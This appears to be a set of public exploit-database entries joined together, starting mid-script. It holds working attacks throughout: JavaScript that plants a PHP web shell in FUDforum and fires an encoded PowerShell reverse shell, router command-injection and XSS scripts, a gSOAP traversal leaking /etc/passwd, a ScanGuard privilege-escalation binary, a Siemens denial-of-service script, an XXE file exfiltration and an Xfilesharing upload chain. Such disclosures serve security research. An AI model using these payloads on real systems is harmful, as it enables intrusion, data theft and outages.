="/fudforum/liquidsky.php?cmd=%70%6f%77%65%72%73%68%65%6c%6c%20%2d%45%6e%63%6f%64%65%64%43%6f%6d%6d%61%6e%64%20%4a%41%42%6a%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%67%41%44%30%41%49%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%55%77%42%35%41%48%4d%41%64%41%42%6c%41%47%30%41%4c%67%42%4f%41%47%55%41%64%41%41%75%41%46%4d%41%62%77%42%6a%41%47%73%41%5a%51%42%30%41%48%4d%41%4c%67%42%55%41%45%4d%41%55%41%42%44%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%6f%41%43%63%41%4d%51%41%35%41%44%49%41%4c%67%41%78%41%44%59%41%4f%41%41%75%41%44%49%41%4f%41%41%75%41%44%45%41%4e%51%41%79%41%43%63%41%4c%41%41%30%41%44%51%41%4d%77%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%67%41%44%30%41%49%41%41%6b%41%47%4d%41%62%41%42%70%41%47%55%41%62%67%42%30%41%43%34%41%52%77%42%6c%41%48%51%41%55%77%42%30%41%48%49%41%5a%51%42%68%41%47%30%41%4b%41%41%70%41%44%73%41%57%77%42%69%41%48%6b%41%64%41%42%6c%41%46%73%41%58%51%42%64%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%41%41%50%51%41%67%41%44%41%41%4c%67%41%75%41%44%59%41%4e%51%41%31%41%44%4d%41%4e%51%42%38%41%43%55%41%65%77%41%77%41%48%30%41%4f%77%42%33%41%47%67%41%61%51%42%73%41%47%55%41%4b%41%41%6f%41%43%51%41%61%51%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%55%67%42%6c%41%47%45%41%5a%41%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%49%41%41%77%41%43%77%41%49%41%41%6b%41%47%49%41%65%51%42%30%41%47%55%41%63%77%41%75%41%45%77%41%5a%51%42%75%41%47%63%41%64%41%42%6f%41%43%6b%41%4b%51%41%67%41%43%30%41%62%67%42%6c%41%43%41%41%4d%41%41%70%41%48%73%41%4f%77%41%6b%41%47%51%41%59%51%42%30%41%47%45%41%49%41%41%39%41%43%41%41%4b%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%4c%51%42%55%41%48%6b%41%63%41%42%6c%41%45%34%41%59%51%42%74%41%47%55%41%49%41%42%54%41%48%6b%41%63%77%42%30%41%47%55%41%62%51%41%75%41%46%51%41%5a%51%42%34%41%48%51%41%4c%67%42%42%41%46%4d%41%51%77%42%4a%41%45%6b%41%52%51%42%75%41%47%4d%41%62%77%42%6b%41%47%6b%41%62%67%42%6e%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%54%41%48%51%41%63%67%42%70%41%47%34%41%5a%77%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%4d%41%41%73%41%43%41%41%4a%41%42%70%41%43%6b%41%4f%77%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%44%30%41%49%41%41%6f%41%47%6b%41%5a%51%42%34%41%43%41%41%4a%41%42%6b%41%47%45%41%64%41%42%68%41%43%41%41%4d%67%41%2b%41%43%59%41%4d%51%41%67%41%48%77%41%49%41%42%50%41%48%55%41%64%41%41%74%41%46%4d%41%64%41%42%79%41%47%6b%41%62%67%42%6e%41%43%41%41%4b%51%41%37%41%43%51%41%63%77%42%6c%41%47%34%41%5a%41%42%69%41%47%45%41%59%77%42%72%41%44%49%41%49%41%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%43%73%41%49%41%41%6e%41%46%41%41%55%77%41%67%41%43%63%41%49%41%41%72%41%43%41%41%4b%41%42%77%41%48%63%41%5a%41%41%70%41%43%34%41%55%41%42%68%41%48%51%41%61%41%41%67%41%43%73%41%49%41%41%6e%41%44%34%41%49%41%41%6e%41%44%73%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%49%41%41%39%41%43%41%41%4b%41%42%62%41%48%51%41%5a%51%42%34%41%48%51%41%4c%67%42%6c%41%47%34%41%59%77%42%76%41%47%51%41%61%51%42%75%41%47%63%41%58%51%41%36%41%44%6f%41%51%51%42%54%41%45%4d%41%53%51%42%4a%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%43%41%48%6b%41%64%41%42%6c%41%48%4d%41%4b%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%79%41%43%6b%41%4f%77%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%56%77%42%79%41%47%6b%41%64%41%42%6c%41%43%67%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%41%41%77%41%43%77%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%67%42%4d%41%47%55%41%62%67%42%6e%41%48%51%41%61%41%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%75%41%45%59%41%62%41%42%31%41%48%4d%41%61%41%41%6f%41%43%6b%41%66%51%41%37%41%43%51%41%59%77%42%73%41%47%6b%41%5a%51%42%75%41%48%51%41%4c%67%42%44%41%47%77%41%62%77%42%7a%41%47%55%41%4b%41%41%70%41%41%6f%41"; xhr = new XMLHttpRequest(); xhr.open("GET", url, true); xhr.send(null); } function submitFormWithTokenJS(token) { var xhr = new XMLHttpRequest(); xhr.open("POST", '/fudforum/adm/admbrowse.php', true); // Send the proper header information along with the request xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=-----------------------------9703186584101745941654835853"); var currentdir = "C:/xampp/htdocs/fudforum"; // webroot - forum directory var fileName = "liquidsky.php"; var url = "/fudforum/adm/admbrowse.php"; var ctype = "application/x-php"; var fileData = "<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; die; }?>"; var boundary = "-----------------------------9703186584101745941654835853"; var fileSize = fileData.length; var body = "--" + boundary + "\r\n"; body += 'Content-Disposition: form-data; name="cur"\r\n\r\n'; body += currentdir + "\r\n"; body += "--" + boundary + "\r\n"; body += 'Content-Disposition: form-data; name="SQ"\r\n\r\n'; body += token + "\r\n"; body += "--" + boundary + "\r\n"; body += 'Content-Disposition: form-data; name="fname"; filename="' + fileName + '"\r\n'; body += "Content-Type: " + ctype + "\r\n\r\n"; body += fileData + "\r\n\r\n"; body += "--" + boundary + "\r\n"; body += 'Content-Disposition: form-data; name="tmp_f_val"\r\n\r\n'; body += "1" + "\r\n"; body += "--" + boundary + "\r\n"; body += 'Content-Disposition: form-data; name="d_name"\r\n\r\n'; body += fileName + "\r\n"; body += "--" + boundary + "\r\n"; body += 'Content-Disposition: form-data; name="file_upload"\r\n\r\n'; body += "Upload File" + '\r\n'; body += "--" + boundary + "--"; xhr.send(body); } //Grab SQ token var req = new XMLHttpRequest(); req.onreadystatechange=function() { if (req.readyState == 4 && req.status == 200) { var htmlPage = req.responseXML; /* fetch html */ var SQ = htmlPage.getElementsByTagName("input")[0] submitFormWithTokenJS(SQ.value); } } req.open("GET", "/fudforum/adm/admuser.php", true); req.responseType = "document"; req.send(); patience();

# Exploit Title: Technicolor TC7300.B0 - 'hostname' Persistent Cross-Site Scripting # Google Dork: N/A # Date: 2019-11-11 # Exploit Author: Luis Stefan # Vendor Homepage: https://www.technicolor.com/ # Software Link: N/A # Version: TC7300.B0 - STFA.51.20 # Tested on: macOS Mojave and Catalina # CVE : #!/usr/bin/env python3 __author__ = "Luis Stefan" __license__ = "MIT" __version__ = "1.0" __email__ = "[email protected]" __description__ = """CVE-2019-17524.py: This script is used to exploit a xss vulnerability found in a technicolor device.""" from enum import IntEnum from scapy.all import * import codecs, threading, time # Define your network interface interface = 'en0' # Insert your interface card mac address mac = 'xx:xx:xx:xx:xx:xx' broadcast = 'ff:ff:ff:ff:ff:ff' mac_hxd = codecs.decode(mac.replace(':', ''),'hex') class Bootp(IntEnum): Discover = 1 Offer = 2 Request = 3 Decline = 4 Ack = 5 Nak = 6 Release = 7 def dhcp_discover(): disc_pkt = Ether(src=mac, dst=broadcast) / \ IP(src='0.0.0.0', dst='255.255.255.255') / \ UDP(dport=67, sport=68) / BOOTP(chaddr=mac_hxd) / \ DHCP(options=[('message-type', 'discover'), 'end']) sendp(disc_pkt, iface=interface) def dhcp_request(pkt): yraddr = pkt['BOOTP'].yraddr # gwaddr == Gateway Ip Address gwaddr = '192.168.0.1' param_req_list = [] hostname = "<script>alert('XSS triggered')</script>" req_pkt = Ether(src=mac, dst=broadcast) / \ IP(src='0.0.0.0', dst='255.255.255.255') / \ UDP(dport=67, sport=68) / BOOTP(chaddr=mac_hxd) / \ DHCP(options=[('message-type', 'request'), ('server_id', gwaddr), ('requested_addr', yraddr), ('hostname', hostname), 'end']) sendp(req_pkt, iface=interface) def dhcp(pkt): print(pkt.display()) print("#############################################################") if pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Offer: dhcp_request(pkt) elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Ack: print("Server Acknowledged") sys.exit(0) elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Decline: print("Server Declined") sys.exit(0) elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Nak: print("Server Nak") sys.exit(0) def ver_dhcp(): print("Verifying DHCP port traffic..") sniff(iface=interface, prn=dhcp, filter="port 68 and port 67", timeout=20) sys.exit(0) def main(): t1 = threading.Thread(target=ver_dhcp, args=()) t1.setDaemon = True t1.start() time.sleep(2) dhcp_discover() if __name__ == "__main__": main()

# Exploit Title: Technicolor TD5130.2 - Remote Command Execution # Date: 2019-11-12 # Exploit Author: João Teles # Vendor Homepage: https://www.technicolor.com/ # Version: TD5130v2 # Firmware Version: OI_Fw_V20 # CVE : CVE-2019-18396 --------------------------- POST /mnt_ping.cgi HTTP/1.1 Host: HOST User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http:/HOST/mnt_ping.cgi Content-Type: application/x-www-form-urlencoded Content-Length: 53 Cookie: session=COOKIE Connection: close Upgrade-Insecure-Requests: 1 isSubmit=1&addrType=3&pingAddr=;ls&send=Send

# Title: gSOAP 2.8 - Directory Traversal # Author: Numan Türle # Date: 2019-11-13 # Vendor Homepage: https://www.genivia.com/ # Version : gSOAP 2.8 # Software Link : https://www.genivia.com/products.html#gsoap POC --------- GET /../../../../../../../../../etc/passwd HTTP/1.1 Host: 10.200.106.101 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close Response --------- HTTP/1.1 200 OK Server: gSOAP/2.8 Content-Type: application/octet-stream Content-Length: 51 Connection: close root:$1$$qRPK7m23GJusamGpoGLby/:0:0::/root:/bin/sh

# Exploit Title: Fastweb Fastgate 0.00.81 - Remote Code Execution # Date: 2019-11-13 # Exploit Author: Riccardo Gasparini # Vendor Homepage: https://www.fastweb.it/ # Software Link: http://59.0.121.191:8080/ACS-server/file/0.00.81_FW_200_Askey (only from Fastweb ISP network) # Version: 0.00.81 # Tested on: Linux # CVE : N/A import requests, json, time, sys current_milli_time = lambda: int(round(time.time() * 1000)) password='XXXXXXXXXXXXXXX' if password == 'XXXXXXXXXXXXXXX': print("Password is set to XXXXXXXXXXXXXXX\nOpen the script and change the password") sys.exit(-1) #get XSRF-TOKEN headers = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36', 'Referer': 'http://192.168.1.254/tr069', } params = () response = requests.get('http://192.168.1.254', headers=headers) #login request and get sessionKey xsrfToken=response.cookies['XSRF-TOKEN'] cookies = { 'XSRF-TOKEN': xsrfToken, } headers = { 'Pragma': 'no-cache', 'X-XSRF-TOKEN': xsrfToken, 'Accept-Language': 'en-US,en-GB;q=0.9,en;q=0.8,it-IT;q=0.7,it;q=0.6,es;q=0.5,de;q=0.4', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36', 'Accept': 'application/json, text/plain, */*', 'Referer': 'http://192.168.1.254/tr069', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Cache-Control': 'no-cache', } params = ( ('_', str(current_milli_time())), ('cmd', '3'), ('nvget', 'login_confirm'), ('password', password), ('remember_me', '1'), ('sessionKey', 'NULL'), ('username', 'admin'), ) response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies) jsonResponse = json.loads(response.text) sessionKey=jsonResponse["login_confirm"]["check_session"] print("Executing command reboot\n") #some commands as example are shown below in the mount parameter params = ( ('_', str(current_milli_time())), ('act','nvset'), ('service','usb_remove'), #Code execution #('mount','&ping -c 10 192.168.1.172&'), #('mount','&dropbear -r /etc/dropbear/dropbear_rsa_host_key&'),#to enable SSH ('mount','&reboot&'), ('sessionKey', sessionKey), ) response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies) print(response.text) #logout params = ( ('_', str(current_milli_time())), ('cmd', '5'), ('nvget', 'login_confirm'), ('sessionKey', sessionKey), ) response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies) print(json.dumps(json.loads(response.text), indent=2))

# Exploit Title: ScanGuard Antivirus 2020 - Insecure Folder Permissions # Date: 2019-10-10 # Exploit Author: hyp3rlinx # Vendor Homepage: https://www.scanguard.com/ # Software Link: https://support.scanguard.com/en/kb/22/upgrades-available # Version: 2020 # Tested on: Windows # CVE : N/A # Category: exploit SCANGUARD-ANTIVIRUS-INSECURE-PERMISSIONS.txt [+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SCANGUARD-ANTIVIRUS-INSECURE-PERMISSIONS.txt [+] ISR: ApparitionSec [Vendor] https://www.scanguard.com [Product] ScanGuard Antivirus ScanGuard_Setup.exe Hash: 1a63c67a249da0c2e9abd09d35c3c65d Complete Antivirus & Security Software [Vulnerability Type] Insecure Permissions [CVE Reference] CVE-2019-18895 [Affected Product Code Base] ScanGuard Antivirus - latest [Affected Component] Permissions on installation directory [Attack Type] Local [Impact Code execution] true [Impact Escalation of Privileges] true [Impact Information Disclosure] true [Attack Vectors] Low integrity malware or non-privileged user replaces an executable to gain Admin privileges. [Reference] https://support.scanguard.com/en/kb/22/upgrades-available [Security Issue] Scanguard through 2019-11-12 on Windows has Insecure Permissions for the installation directory, leading to privilege escalation via a Trojan horse executable file. The product sets weak access control restrictions, as permissions are set to Full Control for Everyone group. This can allow low integrity malware the ability to replace ScanGuard executables. C:\Program Files (x86)\ScanGuard\bins BUILTIN\Users:(OI)(CI)(ID)F Everyone:(OI)(CI)(ID)F NT SERVICE\TrustedInstaller:(ID)F NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F NT AUTHORITY\SYSTEM:(ID)F [Exploit/POC] #include <stdio.h> #include <windows.h> #define TARGET "C:\\Program Files (x86)\\ScanGuard\\ScanGuard.exe" #define DISABLED_TARGET "C:\\Program Files (x86)\\ScanGuard\\~.conf" /* ScanGuard EoP PoC By hyp3rlinx */ BOOL PWNED=FALSE; BOOL FileExists(LPCTSTR szPath){ DWORD dwAttrib = GetFileAttributes(szPath); return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY)); } void main(void){ if(!FileExists(DISABLED_TARGET)){ rename(TARGET, DISABLED_TARGET); printf("[+] ScanGuard Antivirus EoP PoC\n"); Sleep(300); printf("[+] Disabled ScanGuard.exe ...\n"); Sleep(300); }else{ PWNED=TRUE; } char fname[MAX_PATH]; char newLoc[]=TARGET; DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH); if (size){ if(!PWNED){ printf("[+] Copying exploit to vuln dir...\n"); Sleep(300); CopyFile(fname, newLoc, FALSE); printf("[+] Replaced legit ScanGuard...\n"); Sleep(300); printf("[+] Done!\n"); Sleep(300); MoveFile(fname, "c:\\Program Files (x86)\\ScanGuard\\ScamGuard.lnk"); Sleep(2000); exit(0); }else{ if(FileExists("ScamGuard.lnk")){ system("DEL /f ScamGuard.lnk"); } printf("[+] ScamGuard PWNED!!!"); printf("[+] By hyp3rlinx\n"); system("pause"); } } } [Disclosure Timeline] Vendor Notification: September 16, 2019 Received vendor acknowledgement: September 16, 2019 Second contact follow up: September 29, 2019 No more vendor replies. November 12, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

# Title: Siemens Desigo PX 6.00 - Denial of Service (PoC) # Author: LiquidWorm # Date: 2019-11-14 # Vendor web page: https://www.siemens.com # Product web page: https://new.siemens.com/global/en/products/buildings/automation/desigo.html # Affected version:6.00 # Affected version: Model: PXC00-E.D, PXC50-E.D, PXC100-E.D, PXC200-E.D # With Desigo PX Web modules: PXA40-W0, PXA40-W1, PXA40-W2 # All firmware versions < V6.00.320 # ------ # Model: PXC00-U, PXC64-U, PXC128-U # With Desigo PX Web modules: PXA30-W0, PXA30-W1, PXA30-W2 # All firmware versions < V6.00.320 # ------ # Model: PXC22.1-E.D, PXC36-E.D, PXC36.1-E.D # With activated web server # All firmware versions < V6.00.320 # CVE: N/A # Advisory ID: ZSL-2019-5542 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5542.php #!/bin/bash # # # Siemens Desigo PX V6.00 Web Remote Denial of Service Exploit # # # Vendor: Siemens AG # Vendor web page: https://www.siemens.com # Product web page: https://new.siemens.com/global/en/products/buildings/automation/desigo.html # # Summary: Desigo PX is a modern building automation and control # system for the entire field of building service plants. Scalable # from small to large projects with highest degree of energy efficiency, # openness and user-friendly operation. # # Desc: The device contains a vulnerability that could allow an attacker # to cause a denial of service condition on the device's web server # by sending a specially crafted HTTP message to the web server port # (tcp/80). The security vulnerability could be exploited by an attacker # with network access to an affected device. Successful exploitation # requires no system privileges and no user interaction. An attacker # could use the vulnerability to compromise the availability of the # device's web service. While the device itself stays operational, the # web server responds with HTTP status code 404 (Not found) to any further # request. A reboot is required to recover the web interface. # # Tested on: HP StorageWorks MSL4048 httpd # # ================================================================================ # Expected result after sending the directory traversal sequence: /dir?dir=../../: # -------------------------------------------------------------------------------- # # $ curl http://10.0.0.17/index.htm # <HEAD><TITLE>404 Not Found</TITLE></HEAD> # <BODY><H1>404 Not Found</H1> # Url '/INDEX.HTM' not found on server<P> # </BODY> # # ================================================================================ # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # Zero Science Lab - https://www.zeroscience.mk # @zeroscience # # # # Vendor ID: SSA-898181 # Vendor Fix: https://support.industry.siemens.com/cs/document/109772802 # Vendor Advisory PDF: https://cert-portal.siemens.com/productcert/pdf/ssa-898181.pdf # Vendor Advisory TXT: https://cert-portal.siemens.com/productcert/txt/ssa-898181.txt # Vendor ACK: https://new.siemens.com/global/en/products/services/cert/hall-of-thanks.html # # CWE ID: CWE-472: External Control of Assumed-Immutable Web Parameter # CWE URL: https://cwe.mitre.org/data/definitions/472.html # CVE ID: CVE-2019-13927 # CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13927 # CVSS v3.1 Base Score: 5.3 # CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:H/RL:O/RC:C # # # 06.06.2019 # echo -ne "\n----------------------------------" echo -ne "\nSiemens Desigo PX HTTP Web RMI DoS" echo -ne "\n----------------------------------\n" if [ "$#" -ne 1 ]; then echo -ne "\nUsage: $0 [ipaddr]\n\n" exit fi IP=$1 TARGET="http://$IP/" PAYLOAD=`echo -ne "\x64\x69\x72\x3f\x64\x69\x72\x3d\x2e\x2e\x2f\x2e\x2e\x2f"` echo -ne "\n[+] Sending payload to $IP on port 80." curl -s "$TARGET$PAYLOAD" > /dev/null echo -ne "\n[*] Done" echo -ne "\n[+] Checking if exploit was successful..." status=$(curl -Is http://$IP/index.htm 2>/dev/null | head -1 | awk -F" " '{print $2}') if [ "$status" == "404" ]; then echo -ne "\n[*] Exploit successful!\n" else echo -ne "\n[-] Exploit unsuccessful.\n" exit fi

# Exploit Title: oXygen XML Editor 21.1.1 - XML External Entity Injection # Author: Pablo Santiago # Date: 2019-11-13 # Vendor Homepage: https://www.oxygenxml.com/ # Source:https://www.oxygenxml.com/xml_editor/download_oxygenxml_editor.html # Version: 21.1.1 # CVE : N/A # Tested on: Windows 7 #PoC 1- python -m SimpleHTTPServer 8000 1.1- Poc.xml : <?xml version="1.0"?> <!DOCTYPE test [ <!ENTITY % file SYSTEM "C:\Windows\win.ini"> <!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd"> %dtd;]> <pwn>&send;</pwn> 1.2.- payload.dtd <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>"> %all; 2- File -> Open -> *.xml #PoC Visual https://imgur.com/2H8DhL9

# Exploit Title: Xfilesharing 2.5.1 - Arbitrary File Upload # Google Dork: inurl:/?op=registration # Date: 2019-11-4 # Exploit Author: Noman Riffat # Vendor Homepage: https://sibsoft.net/xfilesharing.html # Version: <=2.5.1 # CVE : CVE-2019-18951, CVE-2019-18952 ##################### Arbitrary File Upload ##################### <form action="http://xyz.com/cgi-bin/up.cgi" method="post" enctype="multipart/form-data"> <input type="text" name="sid" value="joe"> <input type="file" name="file"> <input type="submit" value="Upload" name="submit"> </form> Shell : http://xyz.com/cgi-bin/temp/joe/shell.php #################### Local File Inclusion #################### http://xyz.com/?op=page&tmpl=../../admin_settings This URL will fetch "admin_settings.html" template without any authentication. The ".html" extension is hard coded on the server so the included file must be with html extension anywhere on the server. You can even merge LFI with Arbitrary File Upload vulnerability by uploading an html file i.e. "upload.html" and changing the "sid" to "../../../../../../tmp" and so the file gets uploaded in tmp directory of the server. Now you can include the file like following. http://xyz.com/?op=page&tmpl=../../../../../../../tmp/upload The Xfilesharing script has builtin shortcodes as well so you can achieve RCE by including them in that "upload.html" file. Noman Riffat, National Security Services Group Oman @nomanriffat, @nssgoman